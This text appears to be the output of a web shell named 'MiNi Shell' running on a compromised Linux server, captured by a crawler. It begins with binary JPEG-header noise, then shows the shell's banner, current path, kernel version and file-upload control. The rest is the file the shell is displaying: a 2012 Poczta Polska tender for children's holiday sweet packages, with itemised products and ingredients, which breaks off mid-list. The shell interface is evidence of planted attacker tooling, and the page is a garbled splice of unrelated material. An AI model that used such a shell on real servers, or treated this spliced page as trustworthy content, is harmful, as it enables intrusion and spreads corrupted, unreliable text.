JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/227459-N-2012.html

<p class="kh_header"><b>Poznań: Dostawa paczek ze słodyczami dla dzieci</b><br>
<b>Numer ogłoszenia: 227459 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poczta Polska Spółka Akcyjna"  ul. Rakowiecka 26, 00-940 Warszawa, Centrum Infrastruktury Oddział Regionalny w Poznaniu , ul. Głogowska 17, 60-943 Poznań, woj. wielkopolskie, tel. 0-61/8697011, faks 0-61/8697134.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paczek ze słodyczami dla dzieci.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przygotowanie i dostawa paczek ze słodyczami dla dzieci pracowników i rencistów jednostek organizacyjnych Poczty Polskiej S.A. obsługiwanych przez Komisje Socjalne.
Przedmiot zamówienia został podzielony na 2 odrębne i niezależne od siebie części:
2.	Dotyczy części nr 1 i 2:
1)	Oferowanie produktów równoważnych
a)	Z uwagi na przeznaczenie przedmiotu zamówienia, charakter okoliczności i specyfikę zamówienia (asortyment wchodzący w skład paczki jest towarem nabywanym w ramach funduszu socjalnego jako paczki przeznaczone dla dzieci pracowników zatrudnionych w jednostkach organizacyjnych Zamawiającego) w załączniku nr 1 część  nr 1 pkt. 1 oraz część nr 2 pkt. 1 ogłoszenia, wskazano nazwy handlowe produktów, które Zamawiający chce otrzymać.
W oparciu o przeprowadzone przez Zamawiającego rozeznanie stwierdzono, iż wskazane z nazwy produkty stanowią preferencje i upodobania smakowe dzieci, a jednocześnie produkty te cechują się pożądaną jakością i dużymi walorami smakowymi, dlatego asortyment ten stanowi zawartość paczki.
b)	Zgodnie z art. 29 ust. 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza możliwość złożenia oferty równoważnej. Z uwagi na przeznaczenie zamawianego asortymentu, Zamawiający wskazuje w załączniku nr 1 część  nr 1 pkt. 1 oraz część nr 2 pkt. 1 ogłoszenia nazwy handlowe produktów, które chce otrzymać. Skład oferowanego asortymentu powinien być zgodny ze składem wymaganego asortymentu.
c)	Za produkty równoważne Zamawiający uzna takie, które będą posiadać skład identyczny w stosunku do składu określonego przez Zmawiającego dla asortymentu wymaganego.
d)	Nie dopuszcza się produktów czekolado podobnych i w opakowaniach zastępczych.
2)	Produkty spożywcze i słodycze muszą być wyprodukowane nie wcześniej niż w 2012 r., muszą charakteryzować się wysoką jakością, a ich termin do spożycia musi wynosić co najmniej 3 miesiące od dnia dostarczenia paczek przez Wykonawcę do Zamawiającego. 
3)	Opakowanie:
a)	Pojedyncza paczka winna być w kartonie z tektury z wielokolorowym motywem świątecznym zabezpieczającym zawartość paczki przed zniszczeniem, uszkodzeniem i dekompletacją.
b)	Paczki winny być zapakowane w sposób umożliwiający dalsze transportowanie, zaadresowane zgodnie z wykazem ilościowym. 
4)	Zamawiający zastrzega sobie prawo zmniejszenia ilości paczek maksymalnie o 5 %. W przypadku skorzystania z tego prawa Wykonawcy nie przysługują jakiekolwiek roszczenia ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.81.21.00-4, 15.84.23.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się zrealizowaniem co najmniej 1 dostawy paczek z produktami spożywczymi na kwotę każdej dostawy nie mniejszą niż:
­	dla części nr 1 - 10 000,00 zł brutto,
­	dla części nr 2 - 10 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska Spółka Akcyjna Centrum Infrastruktury Oddział Regionalny w Poznaniu Dział Zamówień Publicznych ul. Głogowska 17, 60-943 Poznań pok. nr 128.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 10:45, miejsce: Poczta Polska Spółka Akcyjna Centrum Infrastruktury Oddział Regionalny w Poznaniu Dział Zamówień Publicznych ul. Głogowska 17, 60-943 Poznań pok. nr 128.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> przygotowanie 670 szt. paczek świątecznych dla dzieci pracowników i rencistów Poczty Polskiej S.A. obsługiwanych socjalnie przez Komisję Socjalną w Zielonej Górze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przygotowanie 670 szt. paczek świątecznych dla dzieci pracowników i rencistów Poczty Polskiej S.A. obsługiwanych socjalnie przez Komisję Socjalną w Zielonej Górze. Skład paczki:
1. Nazwa towaru producent wymaganego asortymentu Czekolada mleczna Milka
Skład wymaganego asortymentu Cukier, tłuszcz kakaowy, odtłuszczone mleko w proszku, miazga kakaowa, serwatka w proszku, tłuszcz mleczny, pasta z orzechów laskowych,
Waga nie mniej niż 100 g
2. Nazwa towaru producent wymaganego asortymentu Czekolada nadziewana owocowa typu Wedel
Skład wymaganego asortymentu Czekolada mleczna 50%, cukier, zagęszczony przecier jabłkowy, tłuszcz roślinny częściowo utwardzony, jogurt w proszku, nadzienie poziomkowe, nadzienie jagodowe, serwatka w proszku, mleko pełne w proszku, substancja utrzymująca wilgotność (sorbitol),spirytus 0,3%, emulgator (lecytyna sojowa), aromaty, regulator kwasowości (kwas cytrynowy), barwnik (koszenila), zawiera mleko, soję, może zawierać orzechy arachidowe, orzechy, zboża, jaja.
Waga nie mniej niż 100 g
3. Nazwa towaru producent wymaganego asortymentu Czekolada mleczna z całymi orzechami typu Alpen Gold
Skład wymaganego asortymentu tłuszcz roślinny, cukier, aromat, laktoza, serwatka w proszku, miazga kakaowa, tłuszcz mleczny, tłuszcz kakaowy, orzechy laskowe, pełne mleko w proszku, śmietanka w proszku, emulgatory - lecytyna sojowa, E 476,
Waga nie mniej niż 100 g
4. Nazwa towaru producent wymaganego asortymentu Batoniki czekoladowe z nadzieniem mlecznym w kartoniku typu Kinder czekolada
Skład wymaganego asortymentu Czekolada mleczna 40% (cukier, mleko pełne w proszku, tłuszcz kakaowy, miazga kakaowa, emulgatory: lecytyny (soja), aromat), cukier, mleko odtłuszczone w proszku, tłuszcze roślinne, masło odwodnione, emulgator: lecytyny (soja), aromat sucha masa mleczna 33%, sucha masa kakaowa 13%.
Waga nie mniej niż 100 g
5. Nazwa towaru producent wymaganego asortymentu Biszkopty z galaretką owocową - Delicje szampańskie
Skład wymaganego asortymentu Syrop glukozowo-fruktozowy, cukier, czekolada 15% (cukier, miazga kakaowa, tłuszcz kakaowy, emulgatory (lecytyna sojowa, E476), aromat- wanilina), mąka pszenna, jaja, skrobia ziemniaczana, glicerol- substancja utrzymująca wilgotność, olej rzepakowy, substancja żelująca (pektyna), regulatory kwasowości (kwas cytrynowy, kwas jabłkowy, cytrynian sodu, kwas askorbinowy), zagęszczony sok pomarańczowy i rozdrobniona pomarańcza, substancje żelujące (pektyna, guma arabska, guar).
Waga nie mniej niż 294 g
6. Nazwa towaru producent wymaganego asortymentu Pierniki - Precle w czekoladzie
Skład wymaganego asortymentu czekolada 17% (cukier, miazga kakaowa, tłuszcz kakaowy, tłuszcz roślinny) mąka pszenna  syrop glukozowo - fruktolinowy substancja spulchniająca
 barwnik karmelowy amoniakalny
Waga nie mniej niż 400 g
7. Nazwa towaru producent wymaganego asortymentu Cukierki Michaszki typu Mieszko
Skład wymaganego asortymentu Wyrób w czekoladzie: orzechy arachidowe,(29,75%), czekolada ( 24%) - cukier, miazga kakaowa, tłuszcz roślinny, tłuszcz mleczny, tłuszcz kakaowy, emulgatory: lecytyna sojowa,E476, Aromat), cukier, mleko w proszku pełne, tłuszcz roślinny utwardzony, kakao o obniżonej zawartości tłuszczu, alkohol, aromat, czekolada - masa kakaowa minimum 40%. Produkt może zawierać śladowe ilości żółtka jaj w proszku, glutenu i innych orzechów, oprócz tłuszczu kakaowego zawiera tłuszcze roślinne.
Waga nie mniej niż 440 g
8. Nazwa towaru producent wymaganego asortymentu Ptasie mleczko waniliowe Wedel
Skład wymaganego asortymentu Czekolada mleczna 26% (cukier, miazga kakaowa ,tłuszcz kakaowy, tłuszcz mleczny, emulgatory: lecytyna sojowa i E476, aromat), cukier, syrop glukozowy, masło, mleko zagęszczone, białko jaja w proszku, substancja żelująca: agar, regulator kwasowości: kwas cytrynowy, substancja konserwująca E202, aromaty, etylowanilina, ekstrakt z wanilii. Czekolada deserowa: masa kakaowa minimum 47%. Może zawierać śladowe ilości orzechów arachidowych i innych orzechów.
Waga nie mniej niż 420 g
9. Nazwa towaru producent wymaganego asortymentu Czekoladki Merci typu Wedel
Skład wymaganego asortymentu 8 rodzajów oddzielnie pakowanych czekoladek, cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne proszku, śmietana w proszku, tłuszcz roślinny, migdały, orzechy laskowe, laktoza, maślanka w proszku, produkt z serwatki, dekstroza, tłuszcz mleczny, odtłuszczone mleko proszku, kakao odtłuszczone, emulgator lecytyna sojowa, syrop glukozowy, syrop cukrowy inwertowany, fruktoza, kawa, aromat, sól
Waga nie mniej niż 250 g
10. Nazwa towaru producent wymaganego asortymentu Raffaello Bombonierka
Skład wymaganego asortymentu Suszony kokos 23,5%, cukier, olej roślinny, odtłuszczone mleko w proszku, tłuszcze roślinne, cały migdał (8%), mąka pszenna, serwatka w proszku, aromaty, emulgator (lecytyna sojowa), mąka żytnia, substancja spulchniająca (wodorowęglan sodu), sól.
Waga nie mniej niż 240 g
11. Nazwa towaru producent wymaganego asortymentu Cukierki M&MS Choco
Skład wymaganego asortymentu Orzeszki ziemne (23%) oblane mleczną czekoladą (48%), w chrupiących kolorowych skorupkach: cukier, orzeszki ziemne, miazga kakaowa, pełne mleko w proszku, tłuszcz kakaowy, laktoza, serwatka w proszku, skrobia, tłuszcz roślinny, syrop glukozowy, substancja żelująca (guma arabska), emulgatory (lecytyna sojowa, E442), dekstryny, barwniki (E120, E133, E160a, E171), substancja glazurująca (wosk carnauba), aromaty, olej roślinny, sól. Śladowe ilości: orzech laskowy, migdał. Czekolada oprócz tłuszczu kakaowego zawiera tłuszcze roślinne.
Waga nie mniej niż 100 g
12. Nazwa towaru producent wymaganego asortymentu Cukierki typu Kinder Schoko - Bons
Skład wymaganego asortymentu Czekolada mleczna 50% (cukier, mleko pełne w proszku, tłuszcz kakaowy, miazga kakaowa, emulgator: lecytyna sojowa, aromat), cukier, odtłuszczone mleko w proszku, tłuszcz roślinny, orzechy laskowe (5,8%), masło odwodnione, czekolada (cukier, miazga kakaowa, tłuszcz kakaowy, emulgator: lecytyna sojowa, aromat), substancja glazurująca (guma arabska, szelak), syrop glukozowy, emulgator (lecytyna sojowa), aromaty.
Waga nie mniej niż 125 g
13. Nazwa towaru producent wymaganego asortymentu Cukierki zozole typu Mieszko
Skład wymaganego asortymentu Cukier, syrop glukozowy, skrobia kukurydziana, syrop cukru inwertowanego, skoncentrowany sok jabłkowy 9%, skrobia pszenna, kwas jabłkowy, kwas cytrynowy, glicerol, aromaty, cytrynian potasu, sól, E171 Dwutlenek tytanu, E150d.
Waga nie mniej niż 75 g
14. Nazwa towaru producent wymaganego asortymentu Galaretka owocowa Choinka opolanka
Skład wymaganego asortymentu Cukierki o korpusie z galaretki agarowej o smaku owocowym oblane naturalną czekoladą z dużą zawartością kakao
Waga nie mniej niż 200 g
15. Nazwa towaru producent wymaganego asortymentu Rodzynki w czekoladzie Jutrzenka
Skład wymaganego asortymentu Rodzynki, czekolada mleczna nie mniej niż 48,5%, masa kakaowa  w czekoladzie mlecznej nie mniej niż 30%
Waga nie mniej niż 80 g
16. Nazwa towaru producent wymaganego asortymentu Galaretki w czekoladzie - mieszanka wedlowska
Skład wymaganego asortymentu Cukier, syrop skrobiowy, czekolada, kwas cytrynowy (regulator kwasowości), agar (substancja żelująca), koncentraty owocowe, proszek owocowy, może zawierać śladowe ilości orzechów, mleka, jaj, pszenicy.
Waga nie mniej niż 490 g
17. Nazwa towaru producent wymaganego asortymentu Lizaki Nimm 2
Skład wymaganego asortymentu Syrop glukozowy, cukier, regulator kwasowości, kwas mlekowy, zagęszczone soki owocowe 1%, jabłko limonka pomarańcza cytryna, wiśnia, malina, czarna porzeczka, jeżyna, aronia, czarny bez, winogrona, mleczas sodu, wyciągi z roślin(kurkuma, papryka) aromat, witamina C barwnik, karmina, kapsantyna, dwutlenek tytanu, kompleksy miedziowe, chlorofil, węgiel roślinny, witamina E niacyna, witamina B6, witamina B12
Waga nie mniej niż  80 g
18. Nazwa towaru producent wymaganego asortymentu Chrupiący smakołyk z kremowym nadzieniem i orzechem w polewie - Ferrero Rocher  
Skład wymaganego asortymentu Mleczna czekolada 30% (cukier, tłuszcz kakaowy, miazga kakaowa, odtłuszczone mleko w proszku, odwodnione masło, emulgator: lecytyna sojowa; aromat), orzechy laskowe (30%), cukier, olej roślinny, mąka pszenna, serwatka w proszku, kakao w proszku o obniżonej zawartości tłuszczu, emulgator (lecytyna sojowa), odtłuszczone mleko w proszku, substancje spulchniające (wodorowęglan sodu), sól, aromat.
Waga nie mniej niż 200 g
19. Nazwa towaru producent wymaganego asortymentu Jajka niespodzianki typu Ferraro Rocher - pakowane po 4 szt w kartoniku
Skład wymaganego asortymentu Jajko z czekolady z zabawką w środku, czekolada mleczna nie mniej niż 47%, sucha masa mleczna nie mniej niż 32%, sucha masa kakaowa nie mniej niż 15%
Waga nie mniej niż 80 g
20. Nazwa towaru producent wymaganego asortymentu Karmelki mleczne Storck
Skład wymaganego asortymentu Karmelowy cukierek twardy produkowany z prawdziwego masła i śmietany
Waga nie mniej niż 90 g
21. Nazwa towaru producent wymaganego asortymentu Praliny nadziewane kremem typu Milka Crispello
Skład wymaganego asortymentu Praliny nadziewane nadzieniem kakaowym (38% i waflem (7%), oblane czekoladą mleczną z mleka alpejskiego , cukier, tłuszcze roślinne, tłuszcz kakaowy, odtłuszczone mleko w proszku, mąka pszenna, pełne mleko w proszku, serwatka w proszku, ,miazga kakaowa, tłuszcz mleczny, Maltodekstryna,  kakao w proszku o obniżonej zawartości tłuszczu 2%, emulatory(lecytyna sojowa, E476),pasta z orzechów laskowych, skrobia ziemniaczana, olej roślinny, substancje spulchniające ( wodorowęglan amonu, wodowęglan sodu), sól, aromaty masa kakaowa w czekoladzie mlecznej minimum 30%
Waga nie mniej niż 150 g
22. Nazwa towaru producent wymaganego asortymentu Kalendarz adwentowy
Waga nie mniej niż 65g
23. Nazwa towaru producent wymaganego asortymentu Pudełko z twardej tektury z motywem świątecznym

UWAGA:
Zamawiający nie dopuszcza produktów czekolado podobnych i w opakowaniach zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.81.21.00-4, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przygotowanie 550 szt. paczek świątecznych dla dzieci pracowników i rencistów Poczty Polskiej S.A. obsługiwanych socjalnie przez Komisję Socjalną w Gorzowie Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przygotowanie 550 szt. paczek świątecznych dla dzieci pracowników i rencistów Poczty Polskiej S.A. obsługiwanych socjalnie przez Komisję Socjalną w Gorzowie Wlkp. Skład paczki:
1.	Nazwa towaru producent wymaganego asortymentu Czekolada nadziewana owocowa typu Wedel
Skład wymaganego asortymentu Czekolada mleczna 50%, cukier, zagęszczony przecier jabłkowy, tłuszcz roślinny częściowo utwardzony, jogurt w proszku, nadzienie poziomkowe, nadzienie jagodowe, serwatka w proszku, mleko pełne w proszku, substancja utrzymująca wilgotność (sorbitol),spirytus 0,3%, emulgator (lecytyna sojowa), aromaty, regulator kwasowości (kwas cytrynowy), barwnik (koszenila), zawiera mleko, soję, może zawierać orzechy arachidowe, orzechy, zboża, jaja.
Waga nie mniej niż 100 g
2.	Nazwa towaru producent wymaganego asortymentu Czekolada mleczna z całymi orzechami typu Alpen Gold
Skład wymaganego asortymentu tłuszcz roślinny, cukier, aromat, laktoza, serwatka w proszku, miazga kakaowa, tłuszcz mleczny, tłuszcz kakaowy, orzechy laskowe, pełne mleko w proszku, śmietanka w proszku, emulgatory - lecytyna sojowa, E 476,
Waga nie mniej niż 100 g
3.	Nazwa towaru producent wymaganego asortymentu Batoniki czekoladowe z nadzieniem mlecznym w kartoniku typu Kinder czekolada
